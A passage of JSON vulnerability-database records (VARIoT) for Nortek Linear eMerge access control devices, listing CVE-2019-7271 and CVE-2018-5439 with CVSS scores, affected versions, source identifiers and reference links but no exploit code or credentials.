            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          },
          {
            "date": "2019-07-02T17:15:11.947000",
            "db": "NVD",
            "id": "CVE-2019-7263"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-101"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158698"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          },
          {
            "date": "2019-07-03T18:45:30.263000",
            "db": "NVD",
            "id": "CVE-2019-7263"
          },
          {
            "date": "2019-07-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-101"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-101"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3 Series device vulnerabilities related to source code",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "code problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-101"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0172

    Vulnerability from variot - Updated: 2023-12-18 12:28

    Nortek Linear eMerge 50P/5000P devices have Default Credentials. Nortek Linear eMerge 50P/5000P The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security & Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security & Control Company in the United States. A trust management issue vulnerability exists in Nortek Security & Control Linear eMerge 50P/5000P. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0172",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge 50p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge 50p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7271"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7271"
          }
        ]
      },
      "cve": "CVE-2019-7271",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7271",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.9,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-158706",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7271",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7271",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-029",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158706",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-7271",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158706"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7271"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-029"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Nortek Linear eMerge 50P/5000P devices have Default Credentials. Nortek Linear eMerge 50P/5000P The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security \u0026 Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security \u0026 Control Company in the United States. A trust management issue vulnerability exists in Nortek Security \u0026 Control Linear eMerge 50P/5000P. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158706"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7271"
          }
        ],
        "trust": 1.8
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7271",
            "trust": 2.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006003",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-029",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-158706",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7271",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158706"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7271"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-029"
          }
        ]
      },
      "id": "VAR-201907-0172",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158706"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2023-12-18T12:28:08.439000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "EMERGE 50P/5000P BROWSER MANAGED ACCESS SYSTEMS 4.X",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/products/access-control-systems/emerge-browser-managed-access-systems-2/"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/syrti/poc_to_review "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2019-7271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-522",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-255",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7271"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://www.applied-risk.com/resources/ar-2019-006"
          },
          {
            "trust": 1.8,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7271"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7271"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/522.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/syrti/poc_to_review"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158706"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7271"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-029"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-158706"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7271"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-029"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-01T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158706"
          },
          {
            "date": "2019-07-01T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7271"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          },
          {
            "date": "2019-07-01T21:15:11.233000",
            "db": "NVD",
            "id": "CVE-2019-7271"
          },
          {
            "date": "2019-07-01T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-029"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-08-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158706"
          },
          {
            "date": "2020-08-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7271"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          },
          {
            "date": "2020-08-24T17:37:01.140000",
            "db": "NVD",
            "id": "CVE-2019-7271"
          },
          {
            "date": "2020-08-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-029"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-029"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Nortek Linear eMerge 50P/5000P Vulnerabilities related to certificate and password management in devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006003"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-029"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201802-1043

    Vulnerability from variot - Updated: 2023-12-18 10:50

    A Command Injection issue was discovered in Nortek Linear eMerge E3 series Versions V0.32-07e and prior. A remote attacker may be able to execute arbitrary code on a target machine with elevated privileges. Nortek Security&Control is a company that provides wireless security, home automation and personal security systems and devices. The platform provides scalable, browser-based access control capabilities

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201802-1043",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "emerge e3",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "0.32-07e"
          },
          {
            "model": "linear emerge e3 series \u003c=v0.32-07e",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge e3",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "nortek",
            "version": "0.32-07e"
          },
          {
            "model": "emerge e3",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "nortekcontrol",
            "version": "0.32-07e"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-002424"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5439"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-814"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "0.32-07e",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:emerge_e3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-5439"
          }
        ]
      },
      "cve": "CVE-2018-5439",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2018-5439",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.9,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-03483",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-135470",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2018-5439",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2018-5439",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-03483",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201802-814",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-135470",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2018-5439",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          },
          {
            "db": "VULHUB",
            "id": "VHN-135470"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5439"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-002424"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5439"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-814"
          }
        ]
      },
      "description": {
        "@context": {
